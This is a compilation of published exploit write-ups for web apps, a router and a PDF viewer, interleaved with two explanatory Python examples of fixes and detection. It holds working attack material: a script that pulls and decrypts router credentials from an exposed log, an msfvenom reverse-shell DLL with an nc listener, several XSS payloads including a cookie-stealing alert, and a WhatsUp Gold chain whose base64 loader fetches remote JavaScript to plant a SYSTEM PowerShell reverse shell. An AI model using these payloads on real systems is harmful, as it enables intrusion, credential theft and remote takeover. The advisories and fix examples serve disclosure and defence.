<pre><code># Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection<br /># Discovered Date: 17/03/2023<br /># Reported Date: 17/03/2023<br /># Exploit Author: Omer Shaik (unknown_exploit)<br /># Vendor Homepage: https://www.sisqualwfm.com<br /># Version: 7.1.319.103<br /># Tested on: SISQUAL WFM 7.1.319.103<br /># Affected Version: sisqualWFM - 7.1.319.103<br /># Fixed Version: sisqualWFM - 7.1.319.111<br /># CVE : CVE-2023-36085<br /># CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (base score 6.1)<br /># Category: Web Apps<br /># Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085<br /><br />Proof of concept (PoC) for a Host header injection vulnerability in sisqualWFM 7.1.319.103 at the /sisqualIdentityServer/core endpoint. The login redirect builds its Location header from the client-supplied Host header, so a tampered Host value is copied verbatim into the redirect target. An attacker can use this to manipulate generated links or to redirect users to another site. Note that tampering with the Host header of your own request only affects your own response; for real impact the injected value has to reach a victim, for example through a caching layer or in server-generated links, which is why the CVSS vector requires user interaction.<br /><br />****************************************************************************************************<br />Original Request<br />****************************************************************************************************<br />GET /sisqualIdentityServer/core/login HTTP/2<br />Host: sisqualwfm.cloud<br />Cookie: <cookie><br />Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />****************************************************************************************************<br />Original Response<br />****************************************************************************************************<br />HTTP/2 302 Found<br />Cache-Control: no-store, no-cache, must-revalidate<br />Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: sameorigin<br />Date: Wed, 22 Mar 2023 13:22:10 GMT<br />Content-Length: 0<br />****************************************************************************************************<br /><br /><br />****************************************************************************************************<br />Modified request: Host header changed to evil.com (intercepted with Burp Proxy)<br />****************************************************************************************************<br />GET /sisqualIdentityServer/core/login HTTP/2<br />Host: evil.com<br />Cookie: <cookie><br />Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />****************************************************************************************************<br />Response<br />****************************************************************************************************<br />HTTP/2 302 Found<br />Cache-Control: no-store, no-cache, must-revalidate<br />Location: https://evil.com/sisqualIdentityServer/core/<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: sameorigin<br />Content-Length: 0<br /><br /><br />****************************************************************************************************<br />Method of Attack<br />****************************************************************************************************<br /><br />Replace <target> with the hostname of the instance under test. A vulnerable instance answers 302 with a Location header that begins with https://attack.host.com/ instead of its own hostname:<br /><br />curl -k -H "Host: attack.host.com" "https://<target>/sisqualIdentityServer/core" -vvv<br /><br />****************************************************************************************************<br /></code></pre>
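The advisory above shows the defect (a redirect whose Location is built from the request's Host header) but not the fix. The following Python is an added example, not code from the SISQUAL advisory or from the vendor: it models the vulnerable redirect beside a hardened one that checks Host against an allowlist of canonical names, and a small off-site check a scanner or proxy extension can run on a captured Location header. The hostnames are the ones in the advisory's request/response pair; the request builder and the handler are constructed stand-ins for the real /sisqualIdentityServer/core login redirect.

```python
"""Host-header-driven redirect: vulnerable handler beside the hardened one.

Added example modelled on the SISQUAL advisory's request/response pair; the
handler, request builder and allowlist are constructed, not the product's code.
"""
from urllib.parse import urlsplit

CANONICAL_HOST = "sisqualwfm.cloud"          # host from the advisory's original request
ALLOWED_HOSTS = {CANONICAL_HOST}             # every name the service legitimately answers on
REDIRECT_PATH = "/sisqualIdentityServer/core/"


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: method, path and lower-cased header map."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def redirect_vulnerable(req: dict) -> str:
    """The bug: Host is trusted verbatim, so Location reflects whatever the client sent."""
    return f"https://{req['headers']['host']}{REDIRECT_PATH}"


def redirect_hardened(req: dict) -> str:
    """The fix: Host is compared against an allowlist and never echoed.

    urlsplit is used to isolate the hostname so that a port suffix or smuggled
    userinfo (sisqualwfm.cloud@evil.com) cannot satisfy a naive string compare.
    """
    host = req["headers"].get("host", "")
    hostname = urlsplit(f"//{host}").hostname or ""
    if hostname not in ALLOWED_HOSTS:
        hostname = CANONICAL_HOST          # fall back to the configured canonical name
    return f"https://{hostname}{REDIRECT_PATH}"


def location_is_off_site(location: str) -> bool:
    """Detection check for a proxy or scanner: does Location leave the allowlisted hosts?"""
    return (urlsplit(location).hostname or "") not in ALLOWED_HOSTS


def build_request(host: str) -> bytes:
    """Constructed request mirroring the advisory's GET /sisqualIdentityServer/core/login."""
    return (f"GET /sisqualIdentityServer/core/login HTTP/1.1\r\nHost: {host}\r\n"
            "User-Agent: poc\r\n\r\n").encode()


def demo() -> dict:
    """Run both handlers over the advisory's hosts plus two allowlist-bypass attempts."""
    results = {}
    for host in (CANONICAL_HOST, "evil.com", "evil.com:443", "sisqualwfm.cloud@evil.com"):
        req = parse_request(build_request(host))
        results[host] = (redirect_vulnerable(req), redirect_hardened(req))
    return results


if __name__ == "__main__":
    for host, (vuln, safe) in demo().items():
        print(f"Host: {host!r:32} vulnerable -> {vuln}  off-site={location_is_off_site(vuln)}")
        print(f"{'':38} hardened   -> {safe}")
```

The hardened handler deliberately falls back to the canonical host rather than returning an error, because the redirect is reached before authentication and a hard failure would only create a denial-of-service lever for the same unauthenticated attacker.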
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br /><br />"""<br />Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption<br />CVE: CVE-2023-43261<br />Script Author: Bipin Jitiya (@win3zz)<br />Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)<br />Software/Hardware: UR5X, UR32L, UR32, UR35, UR41; other Milesight industrial cellular routers may also be affected.<br />Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10<br />Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf<br />"""<br /><br />import sys<br />import requests<br />import re<br />import warnings<br />from Crypto.Cipher import AES  # pip install pycryptodome<br />from Crypto.Util.Padding import unpad<br />import base64<br />import time<br /><br />warnings.filterwarnings("ignore")<br /><br /># Static AES-128-CBC key and IV: the same hardcoded pair decrypts every password found in the log<br /># (the "weak password encryption" in the title).<br />KEY = b'1111111111111111'<br />IV = b'2222222222222222'<br /><br /><br />def decrypt_password(password):<br />    """Base64-decode the logged password and AES-CBC decrypt it with the static key/IV."""<br />    try:<br />        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')<br />    except ValueError as e:<br />        display_output(' [-] Error occurred during password decryption: ' + str(e), 'red')<br /><br /><br />def display_output(message, color):<br />    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}<br />    print(f"{colors[color]}{message}{colors['end']}")<br />    time.sleep(0.5)<br /><br /><br />urls = []<br /><br />if len(sys.argv) == 2:<br />    urls.append(sys.argv[1])<br /><br />if len(sys.argv) == 3 and sys.argv[1] == '-f':<br />    with open(sys.argv[2], 'r') as file:<br />        urls.extend(file.read().splitlines())<br /><br />if len(urls) == 0:<br />    display_output('Please provide a URL or a file with a list of URLs.', 'red')<br />    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')<br />    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')<br />    sys.exit()<br /><br /># Set use_proxy = True to route requests through an intercepting proxy (e.g. Burp on 127.0.0.1:8080).<br />use_proxy = False<br />proxies = {'http': 'http://127.0.0.1:8080/', 'https': 'http://127.0.0.1:8080/'} if use_proxy else None<br /><br />for url in urls:<br />    # The web server log is served without authentication and records login attempts, credentials included.<br />    log_url = url.rstrip('/') + '/lang/log/httpd.log'<br />    display_output('[*] Initiating data retrieval for: ' + log_url, 'blue')<br />    try:<br />        response = requests.get(log_url, proxies=proxies, verify=False, timeout=15)<br />    except requests.RequestException as e:<br />        display_output('[-] Request failed for ' + url + ': ' + str(e), 'red')<br />        continue<br /><br />    if response.status_code == 200:<br />        display_output('[+] Data retrieval successful for: ' + log_url, 'green')<br />        data = response.text<br />        # Each logged login attempt carries the JSON fragment "username":"...","password":"..."<br />        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))<br /><br />        num_credentials = len(credentials)<br />        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')<br /><br />        if num_credentials > 0:<br />            display_output('[+] Login page: ' + url + '/login.html', 'green')<br />            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')<br />            display_output('[+] Unique Credentials:', 'yellow')<br />            for i, (username, password) in enumerate(credentials, start=1):<br />                display_output(f' Credential {i}:', 'cyan')<br />                decrypted_password = decrypt_password(password.encode('utf-8'))<br />                display_output(f' - Username: {username}', 'green')<br />                display_output(f' - Password: {decrypted_password}', 'green')<br />        else:<br />            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')<br />    else:<br />        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')<br /><br /></code></pre>
<pre><code># Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking<br /># Date: 06.02.2024<br /># Exploit Author: Ravishanka Silva<br /># Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader<br /># Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer<br /># Version: 3.5.2<br /># Tested on: Windows 10, Windows 11<br /># CVE : CVE-2024-24528<br /><br />Description:<br />Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight, minimalistic application for viewing PDF, eBook (ePub, Mobi), XPS, DjVu, CHM and comic book (CBZ, CBR) files. Its key features are fast startup and rendering, support for many document formats and a simple interface; it lacks some of the advanced features of other PDF viewers, but is a popular choice for users who prioritise speed and simplicity.<br /><br />A DLL hijacking vulnerability in Sumatra PDF 3.5.2 allows a local attacker to execute arbitrary code and gain persistence on the host, in the context of the currently logged-in user, by placing a crafted DLL in the installation directory. The following DLLs can be hijacked this way:<br />dbgcore.DLL<br />profapi.dll<br />PROPSYS.dll<br />TextShaping.dll<br />DWrite.dll<br /><br />Because the default per-user installation directory lives under %LOCALAPPDATA%, it is writable by the user without elevation. The attacker therefore needs existing code execution as that user; the outcome is persistence in that user's context, not privilege escalation.<br /><br />Proof of Concept:<br /><br />1. Create a malicious DLL with msfvenom:<br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL<br /><br />2. Place the malicious DLL inside the Sumatra PDF installation folder (usually "C:\Users\<username>\AppData\Local\SumatraPDF").<br /><br />3. Start a listener with nc:<br />nc -lvp 7777<br /><br />4. Open Sumatra PDF and observe the reverse shell connecting back.<br /><br />Demo:<br />https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing<br /></code></pre>
<pre><code># Exploit Title: simple urls < 115 XSS<br /># Google Dork:<br /># Exploit Author: AmirZargham<br /># Vendor Homepage: https://getlasso.co/<br /># Software Link: https://wordpress.org/plugins/simple-urls/<br /># Version: < 115<br /># Tested on: firefox,chrome<br /># CVE: CVE-2023-0099<br /># CWE: CWE-79<br /># Platform: MULTIPLE<br /># Type: WebApps<br /><br /><br />Description<br />The Simple URLs WordPress plugin before version 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to reflected cross-site scripting. The search parameter of admin/assets/js/import-js.php is echoed into the response unescaped.<br /><br /><br />Usage Info:<br /><br />Send the malicious link to the victim (the payload goes in the search parameter):<br />https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<script>alert(origin)</script><br /><br /></code></pre>
<pre><code># Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)<br /># Date: 29/09/2023<br /># Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip<br /># Version: 1.0<br /># Last Update: 31 August 2022<br /># Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30<br /><br /># 1: Create a user, log in and go to profile.php.<br /><br /># 2: Submit the payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 (URL-encoded form of x" onmouseover=alert(document.cookie) x=") in the lname field.<br /><br /># 3: The value is stored unescaped and rendered back into a double-quoted attribute on profile.php, which is what the x" ... x=" payload relies on: the injected onmouseover handler is present every time the page loads, and alert(document.cookie) fires when the field is hovered.<br /><br /># Author<br />This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.<br /><br /># About Rapplex<br />Rapplex is a web application security scanner that scans and reports vulnerabilities in websites.<br />Pentesters can use it as an automation tool for daily tasks, and its "Pentester Studio" also supports manual assessments, so no separate development tools are needed to discover new vulnerability types or to extend the existing engines.<br />"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection and File Inclusion.<br /><br /><br /># HTTP Request <br /><br />POST /gym/profile.php HTTP/1.1<br />Host: localhost<br />Content-Length: 129<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE<br />Connection: close<br /><br />fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update<br /><br /></code></pre>
<pre><code># Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: April 18, 2023<br /># Exploit Author: Andreas Finstad (4ndr34z)<br /># Vendor Homepage: https://www.whatsupgold.com<br /># Version: v.22.1.0 Build 39<br /># Tested on: Windows 2022 Server<br /># CVE : CVE-2023-35759<br /># Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759<br /><br /><br /><br />WhatsUp Gold 2022 (22.1.0 Build 39) <br /><br />Stored XSS in the sysName SNMP parameter.<br /><br /><br />Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)<br />Product Name: WhatsUp Gold 2022<br />Version: 22.1.0 Build 39<br />Vulnerability Type: Stored Cross-Site Scripting (XSS)<br /><br />Description:<br />WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that lets an attacker inject script into the admin console. The vulnerability is in the SNMP sysName field of a monitored device: the value returned by the device during SNMP discovery is stored and later rendered in the admin console without escaping.<br /> <br />An attacker who controls an SNMP device on the monitored network sets its sysName to a crafted value containing HTML. Once the device is discovered and the name is displayed in the admin console, the injected code executes in the context of the admin user, allowing the attacker to steal sensitive data or perform actions as that user.<br /><br />As there are no CSRF tokens and no CSP, it is trivial to write a JavaScript payload that adds a scheduled action on the server, which executes code as SYSTEM ("NT System"). In my PoC code, I add a PowerShell reverse shell that connects out to the attacker every 5 minutes.
(screenshot3)<br /><br />The XSS triggers when the admin clicks "All names and addresses".<br /><br />Stage:<br /><br />Loader script, base64 encoded into the id attribute of the staged payload:<br />var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);<br /><br />Staged payload placed in the SNMP sysName field on a device (the onload handler decodes and evals the id):<br /><img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))><br /><br />Payload (served as https://f20.be/t.js):<br /><br />var vhost = window.location.protocol+'\/\/'+window.location.host<br /><br />addaction();<br />async function addaction() {<br />var arguments = ''<br />let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{<br /> method: 'POST',<br /> headers: {<br /> 'Connection': 'close',<br /> 'Content-Length': '1902',<br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',<br /> 'Accept': 'application/json',<br /> 'Content-Type': 'application/json',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'sec-ch-ua-mobile': '?0',<br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',<br /> 'sec-ch-ua-platform': '"macOS"',<br /> 'Sec-Fetch-Mode': 'cors',<br /> 'Sec-Fetch-Dest': 'empty',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include',<br /> body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e 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\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'<br />});<br /><br /><br />setTimeout(() => { getactions(); }, 1000);<br /><br />};<br
/><br /><br /><br />async function getactions() {<br /><br />const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{<br /> method: 'GET',<br /> headers: {<br /> 'Connection': 'close', <br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', <br /> 'Accept': 'application/json', <br /> 'Content-Type': 'application/json', <br /> 'X-Requested-With': 'XMLHttpRequest', <br /> 'sec-ch-ua-mobile': '?0', <br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', <br /> 'sec-ch-ua-platform': '"macOS"', <br /> 'Sec-Fetch-Site': 'same-origin', <br /> 'Sec-Fetch-Mode': 'cors', <br /> 'Sec-Fetch-Dest': 'empty', <br /> 'Accept-Encoding': 'gzip, deflate', <br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include'<br /> <br />});<br />const actions = await response.json();<br />var results = [];<br />var searchField = "Name";<br />var searchVal = "Systemtask";<br />for (var i=0 ; i < actions.length ; i++)<br />{<br /> if (actions[i][searchField] == searchVal) {<br /> results.push(actions[i].Id);<br /> revshell(results[0])<br /> <br /> }<br />}<br />//console.log(actions);<br /><br />};<br /><br /><br />async function revshell(ID) {<br />fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{<br /> method: 'POST',<br /> headers: {<br /> 'Connection': 'close',<br /> 'Content-Length': '2442',<br /> 'Cache-Control': 'max-age=0',<br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',<br /> 'sec-ch-ua-mobile': '?0',<br /> 'sec-ch-ua-platform': '"macOS"',<br /> 'Upgrade-Insecure-Requests': '1',<br /> 'Origin': 'https://192.168.16.100',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',<br /> 'Sec-Fetch-Site': 'same-origin',<br /> 'Sec-Fetch-Mode': 'navigate',<br /> 'Sec-Fetch-User': '?1',<br /> 'Sec-Fetch-Dest': 'iframe',<br /> 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include',<br /> body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522
%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'<br />});<br />};<br /><br /></code></pre>
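The three XSS entries above (Simple URLs, GYM MS, WhatsUp Gold) share one root cause: untrusted input concatenated into HTML without escaping, differing only in the output context the payload has to break out of (element text, a quoted attribute, a page title). The following Python is an added example, not code from any of those advisories or from the affected vendors. It renders each published payload through a constructed vulnerable template and through the escaped version of the same template, uses the standard-library HTML parser to decide whether an executable sink (a script element or an on* handler attribute) actually results, and decodes the base64 stager from the WhatsUp Gold img tag so the loader it runs is visible. The page templates and the fourth, title-closing payload are constructed for the example.

```python
"""XSS in three output contexts: vulnerable concatenation beside escaped output,
plus a decoder for the staged <img onload=eval(atob(this.id))> loader.

Added example. The payloads are the ones published in the Simple URLs, GYM MS and
WhatsUp Gold advisories above; the templates and TITLE_BREAKOUT are constructed.
"""
import base64
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

REFLECTED_SEARCH = "<script>alert(origin)</script>"                                   # Simple URLs ?search=
STORED_LNAME = unquote("x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22")  # GYM MS lname field
STAGED_SYSNAME = ("<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== "
                  "src=https://f20.be/1 onload=eval(atob(this.id))>")               # WhatsUp Gold sysName
TITLE_BREAKOUT = "</title><script>alert(1)</script>"   # constructed: closes a <title> it is echoed into


def render_unsafe(value: str) -> str:
    """The bug common to the advisories: input concatenated into markup unescaped,
    here in three contexts at once: <title> text, a quoted attribute, element text."""
    return (f"<title>Profile of {value}</title>"
            f'<input name="lname" value="{value}">'
            f"<p>Results for {value}</p>")


def render_safe(value: str) -> str:
    """The fix: HTML-escape on output; quote=True also neutralises the quotes that
    let the GYM MS payload close the value attribute and add its own."""
    v = escape(value, quote=True)
    return (f"<title>Profile of {v}</title>"
            f'<input name="lname" value="{v}">'
            f"<p>Results for {v}</p>")


class SinkFinder(HTMLParser):
    """Records what a browser would execute: script elements and on* handler attributes."""

    def __init__(self):
        super().__init__()
        self.sinks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sinks.append("<script>")
        self.sinks.extend(name for name, _ in attrs if name.startswith("on"))


def executable_sinks(markup: str) -> list:
    """Parse the rendered page the way a browser tokenises it and list executable sinks."""
    finder = SinkFinder()
    finder.feed(markup)
    finder.close()
    return finder.sinks


def decode_stager(img_tag: str) -> str:
    """Recover the loader that eval(atob(this.id)) runs from the img's base64 id attribute."""
    m = re.search(r"\bid=([A-Za-z0-9+/=]+)", img_tag)
    if m is None:
        raise ValueError("no base64 id attribute in tag")
    return base64.b64decode(m.group(1)).decode("utf-8").strip()


def demo() -> dict:
    """For each payload: sinks produced by the unsafe render and by the escaped render."""
    results = {}
    for name, payload in (("reflected", REFLECTED_SEARCH), ("stored_attr", STORED_LNAME),
                          ("staged_img", STAGED_SYSNAME), ("title_breakout", TITLE_BREAKOUT)):
        results[name] = (executable_sinks(render_unsafe(payload)),
                         executable_sinks(render_safe(payload)))
    results["stager_js"] = decode_stager(STAGED_SYSNAME)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:15} {value}")
```

The parser-based check matters for the stored attribute case: a regex looking for `onmouseover=` would still match inside the escaped `value="x&quot; onmouseover=..."` and report a false positive, whereas the tokeniser sees a single harmless attribute value. The same distinction is what separates a real fix from one that merely strips the literal string `<script>`.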
<pre><code># Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)<br /># Date: 8th October 2023<br /># Exploit Author: Mücahit Çeri<br /># Vendor Homepage: https://www.circl.lu/<br /># Software Link: https://github.com/MISP/MISP<br /># Version: 2.4.171<br /># Tested on: Ubuntu 20.04<br /># CVE : CVE-2023-37307<br /><br /># Exploit:<br />Logged in as a low-privileged account:<br /><br />1) Click the "Galaxies" button in the top menu.<br />2) Click "Add Cluster" in the left menu.<br />3) Enter the payload "</title><script>alert(1)</script>" in the Name parameter. The leading </title> closes the title element the cluster name is echoed into, so the script tag that follows lands in the document body.<br />4) Fill the other fields with arbitrary values and click Submit.<br />5) When the cluster is displayed, alert(1) executes.<br /><br /></code></pre>
